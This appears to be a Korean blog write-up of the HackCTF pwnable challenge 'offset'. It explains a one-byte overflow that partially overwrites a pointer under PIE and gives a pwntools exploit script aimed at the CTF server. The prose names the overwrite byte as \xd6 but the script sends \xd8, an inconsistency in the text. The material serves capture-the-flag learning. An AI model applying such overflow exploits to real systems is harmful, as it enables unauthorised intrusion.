이번에는 PIE가 걸려있다
gets 함수가 쓰이긴하는데 중요하지 않다
함수 이름부터 수상하다
strcmp 로 1바이트 오버플로우가 발생한다
gdb 로 strcmp 까지 확인해보면
빨간칸에 있는게 30개이고 나머지 한 바이트를 \xd6으로 바꾸면 0x56555600이 0x565556d6으로
바껴 플래그가 출력 될 것이다
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3007)
e = ELF('offset')
payload = 'a'*30
payload += '\xd8'
r.sendline(payload)
r.interactive()
'HackCTF > pwnable' 카테고리의 다른 글
HackCTF - Yes or no (0) | 2021.11.21 |
---|---|
HackCTF - BOF_PIE (0) | 2021.11.21 |
HackCTF - Simple_Overflow_ver_2 (0) | 2021.11.21 |
HackCTF - x64 Simple_size_BOF (0) | 2021.11.21 |
HackCTF - x64 Buffer Overflow (0) | 2021.11.21 |